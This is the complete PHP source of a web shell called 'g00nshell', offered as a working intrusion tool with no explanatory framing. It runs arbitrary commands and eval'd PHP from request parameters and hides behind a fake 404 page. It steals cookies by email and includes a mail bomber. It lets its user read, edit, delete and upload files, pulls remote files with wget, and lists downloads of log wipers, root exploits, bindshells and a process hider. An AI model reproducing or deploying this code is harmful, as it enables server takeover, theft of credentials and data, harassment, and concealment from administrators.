$curuser = @exec('whoami');
$cmd = $_GET['cmd'];
$act = $_GET['act'];
$cmd = $_GET['cmd'];
$cookie = $_GET['cookie'];
$f = $_GET['f'];
$curdir = cleandir(getcwd());
if(!$dir){$dir = $_GET['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $curdir;}
if($dir && $dir != "nullz"){$dir = cleandir($dir);}
$contents = $_POST['contents'];
$gf = $_POST['gf'];
$img = $_GET['img'];
session_start();
@set_time_limit(5);
switch($auth){ // Authentication switcher
case 0: break;
case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
}
function userauth(){ // Basic authentication function
global $user, $pass;
header("WWW-Authenticate: Basic realm='Secure Area'");
if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
hide();
die();
}
}
if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
elseif(!$act && $cmd){
style();
echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
$cmd = exec($cmd, $result);
foreach($result as $line){echo($line . "\n");}
echo("</textarea>");
}
elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
elseif($act == "view" && $f && $dir){view($f, $dir);}
elseif($img){img($img);}
elseif($gf){grab($gf);}
elseif($dir){files($dir);}
else{
switch($act){
case "phpinfo": phpinfo();break;
case "sql": sql();break;
case "files": files($dir);break;
case "email": email();break;
case "cmd": cmd();break;
case "upload": upload();break;
case "tools": tools();break;
case "sqllogin": sqllogin();break;
case "sql": sql();break;
case "lookup": lookup();break;
case "kill": kill();break;
case "phpexec": execphp();break;
default: main();break;
}
}
function cleandir($d){ // Function to clean up the $dir and $curdir variables
$d = realpath($d);
$d = str_replace("\\\\", "//", $d);
$d = str_replace("////", "//", $d);
$d = str_replace("\\", "/", $d);
return($d);
}
function hide(){ // Hiding function
global $self, $soft, $servip, $servport;
die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL $self was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
</BODY></HTML>");
}
function style(){ // Style / header function
global $servip,$version;
echo("<html>\n
<head>\n
<title>g00nshell v" . $version . " - " . $servip . "</title>\n
<style>\n
body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
h1 { color:white; font-family:Verdana; font-size:11px; }\n
h3 { color:white; font-family:Verdana; font-size:11px; }\n
input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
textarea { font-family:Courier; font-size:11px; }\n
a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
a:hover { color:#7F7F7F; }\n
td,th { font-size:12px; vertical-align:middle; }\n
th { font-size:13px; }\n
table { empty-cells:show;}\n
.inf { color:#7F7F7F; }\n
</style>\n
</head>\n");
}
function main(){ // Main/menu function
global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
style();
$act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
$capt = array_flip($act);
echo("<form method='GET' name='shell'>");
echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
echo("<div style='display:none' id='info'>");
echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
echo("\n<br>\n");
if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
echo("\n<br>\n");
if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
else{echo("<b>Disabled functions:</b> None");}
echo("\n<br>\n");
if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
echo("</div>");
echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
echo("<center>");
echo("<h3 align='center'>Links</h3>");
if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
echo("</center>");
echo("<hr>");
echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
die();
}
function cmd(){ // Command execution function
style();
echo("<form name='CMD' method='POST'>");
echo("<b>Command:</b><br>");
echo("<input name='cmd' type='text' size='50'> ");
echo("<select name='precmd'>");
$precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
'Find passwd files'=>'find / -type f -name passwd');
$capt = array_flip($precmd);
foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
echo("</select><br>\n");
echo("<input type='submit' value='Execute'>\n");
echo("</form>\n");
if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
else{die();}
echo("Results: <br><textarea rows=20 cols=100>");
$cmd = @exec($x, $result);
foreach($result as $line){echo($line . "\n");}
echo("</textarea>");
}
function execphp(){ // PHP code execution function
style();
echo("<h4>Execute PHP Code</h4>");
echo("<form method='POST'>");
echo("<textarea name='phpexec' rows=5 cols=100>");
if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
echo("<input type='submit' value='Execute'>");
echo("</form>");
if($_POST['phpexec']){
echo("<textarea rows=10 cols=100>");
eval(stripslashes($_POST['phpexec']));
echo("</textarea>");
}
}
function sqllogin(){ // MySQL login function
session_start();
if($_SESSION['isloggedin'] == "true"){
header("Location: ?act=sql");
}
style();
echo("<form method='post' action='?act=sql'>");
echo("User:<br><input type='text' name='un' size='30'><br>\n");
echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
echo("<input type='submit' value='Login'>");
echo("</form>");
die();
}
function sql(){ // General SQL Function
session_start();
if(!$_GET['sqlf']){style();}
if($_POST['un'] && $_POST['pw']){;
$_SESSION['sql_user'] = $_POST['un'];
$_SESSION['sql_password'] = $_POST['pw'];
}
if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
echo("Invalid credentials<br>\n");
die(sqllogin());
}
else{
$_SESSION['isloggedin'] = "true";
}
}
else{
die(sqllogin());
}
if ($_GET['db']){
mysql_select_db($_GET['db'], $sqlcon);
if($_GET['sqlquery']){
$dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++){
echo(mysql_result($dat, $i) . "<br>\n");
}
}
else if($_GET['table'] && !$_GET['sqlf']){
echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
echo("<table border='1'>");
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!$_GET['p']){
$_GET['p'] = 1;
}
if($_GET['p']){
if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "Select " . $fields[$i] . " FROM " . $_GET['table'] . " Where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
echo("<td>" . $row[0] . "</td>");
}
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
elseif($_GET['table'] && $_GET['sqlf']){
switch($_GET['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_GET['sqlf'] = "";
}
}
else{
echo("<table>");
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
}
echo("</table>");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs)) {
echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
}
}
mysql_close($sqlcon);
}
function sqldownload(){ // Download sql file function
@ob_flush;
$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
mysql_select_db($_GET['db'], $sqlcon);
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
for($x=1;$x<$num_rows;$x++){
$out .= "(";
for($i=0;$i<count($fields);$i++){
$out .= "'";
$query = "Select " . $fields[$i] . " FROM " . $_GET['table'] . " Where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
if($row[0] == ""){
$row[0] = "NULL";
}
if($i != count($fields)-1){
$out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
}
else{
$out .= $row[0]. "'";
}
}
}
$out .= ");\n";
}
$filename = $_GET['table'] . "-" . time() . '.sql';
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($out));
header("Content-disposition: attachment; filename=" . $filename . ";");
echo($out);
die();
}
function sqlinsert(){
style();
$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
mysql_select_db($_GET['db'], $sqlcon);
if($_POST['ins']){
unset($_POST['ins']);
$fields = array_flip($_POST);
$f = implode(",", $fields);
$v = implode(",", $_POST);
$query = "Insert INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
mysql_query($query, $sqlcon) or die(mysql_error());
die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
}
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
echo("<form method='POST'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='Insert' name='ins'>");
echo("</form>");
}
function nicesize($size){
if(!$size){return false;}
if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
elseif ($size >= 1024){return(round($size / 1024) . " KB");}
else{return($size . " B");}
}
function files($dir){ // File manipulator function
style();
global $self, $curdir;
if($dir==""){$dir = $curdir;}
$dirx = explode("/", $dir);
$files = array();
$folders = array();
echo("<form method='GET'>");
echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
echo("<input type='submit' value='Go'>");
echo("</form>");
echo("<h4>File list for ");
for($i=0;$i<count($dirx);$i++){
$totalpath .= $dirx[$i] . "/";
echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
}
echo("</h4>");
echo("<table>");
echo("<th>File Name<th>File Size</th>");
if ($handle = opendir($dir)) {
while (false != ($link = readdir($handle))) {
if (is_dir($dir . '/' . $link)){
$file = array();
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
}
@$file['icon'] = "folder";
if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
array_push($folders, $folder);
}
else{
$file = array();
$ext = strtolower(end(explode(".", $link)));
if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
$file['size'] = "0B";
}
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
}
switch($ext){
case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
default: $file['icon'] = "unknown"; break;
}
if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
array_push($files, $file);
}
}
foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
foreach($files as $file){echo($file);}
echo("</table>");
closedir($handle);
}
}
function email(){ // Email bomber function
$times = $_POST['times'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$body = $_POST['body'];
$from = $_POST['from'];
style();
echo("<h2>Mail Bomber</h2>
<form method='POST' action='?act=email'>
<b>Your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>Their address:</b><br>
<input name='to' type='text' size='35'><br>
<b>Subject:</b><br>
<input name='subject' type='text' size='35'><br>
<b>Text:</b><br>
<input name='body' type='text' size='35'><br>
<b>How many times:</b><br>
<input name='times' type='text' size='5'><br><br>
<input name='submit' type='submit' value='Submit'>
</form>");
if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
}
function view($filename, $dir){ // File view function
if($_POST['fileact'] == "Download"){
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($_POST['contents']));
header("Content-disposition: attachment; filename=" . basename($filename) . ";");
$handle = fopen($filename, "r");
echo(fread($handle, filesize($filename)));
die();
}
style();
if($_POST['contents'] && $_POST['fileact'] == "Save"){
$handle = fopen($filename, 'w');
fwrite($handle, stripslashes($_POST['contents']));
fclose($handle);
echo("Saved file.<br><br>");
echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
die();
}
elseif($_POST['fileact'] == "Delete"){
unlink($filename);
echo("Deleted file.<br><br>");
echo("<a href='?act=files'>Go back</a>");
die();
}
if($dir != "nullz"){ // heh
$filename = $dir."/".$filename;
}
$bad = array("<", ">");
$good = array("<", ">");
$file = fopen($filename, 'r');
$content = fread($file, @filesize($filename));
echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
echo("<textarea style='width:100%; height:92%;' name='contents'>");
echo(str_replace($bad, $good, $content)."\n");
echo("</textarea>");
echo("<input name='fileact' type='submit' value='Save'>");
echo("<input name='fileact' type='submit' value='Delete'>");
echo("<input name='fileact' type='submit' value='Download'>");
echo("</form>");
}
function edit($file, $contents){ // File edit function
style();
$handle = fopen($file, 'w');
fwrite($handle, $contents);
fclose($handle);
echo("Saved file.<br><br>");
echo("<a href='?act=files'>Go back</a>");
}
function upload(){ // Uploading frontend function
global $curdir;
style();
echo("<form name='files' enctype='multipart/form-data' method='POST'>
<b>Output Directory</b><br>
<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
<b>Remote Upload</b><br>
<input type='text' name='rem' size='65'>
<input type='submit' value='Grab'><br><br>
<b>Local File Upload</b><br>
<input name='up' type='file' size='65'>
<input type='submit' value='Upload'>
</form><br>");
if($_POST['rem']){grab($_POST['rem']);}
if($_FILES['up']){up($_FILES['up']);}
}
function up($up){ // Uploading backend function
style();
$updir = $_POST['loc'];
move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
die("File has been uploaded.");
}
function grab($file){ // Uploading backend function
style();
$updir = $_POST['loc'];
$filex = array_pop(explode("/", $file));
if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
else{die("File upload failed.");}
}
function tools(){ // Useful tools function
global $curdir;
style();
$tools = array(
"--- Log wipers ---"=>"1",
"Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
"Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
"--- Priv Escalation ---"=>"2",
"h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- Bindshells ---"=>"3",
"THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- Misc ---"=>"4",
"MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
$names = array_flip($tools);
echo("<b>Tools:</b>");
echo("<form method='post'>");
echo("<b>Output Directory</b><br>");
echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
echo("<select name='gf' style='align:center;'>");
foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
echo("</select>");
echo("<br><input type='submit' value='Grab'>");
echo("</form>");
}
function lookup(){ // Domain lookup function
style();
global $servinf;
$script = "import urllib, urllib2, sys, re
req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
for i in xrange(0,len(site)):
print site[i]"; // My sexy python script
$handle = fopen('lookup.py', 'w');
fwrite($handle, $script);
fclose($handle);
echo("<h4>Domains</h4>");
echo("<ul>");
$cmd = exec("python lookup.py " . $servinf[0], $ret);
foreach($ret as $site){echo("<li>" . $site . "\n");}
unlink('lookup.py');
}
function img($img){ // Images function
$images = array(
"folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
"gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
"d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
"ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
"2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
"ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
"unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
"0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
"binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
"VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
"text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
"ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
"COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
"kUgXEQA7",
"compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
"9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
"M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
"wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
"zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
"b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
"M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
"PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
"zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
"Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
"AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
"AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
"ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
"AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
"ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
"36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
"sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
"AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
"0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=",
"script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
"16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
header('Content-type: image/gif');
echo base64_decode($images[$img]);
die();
}
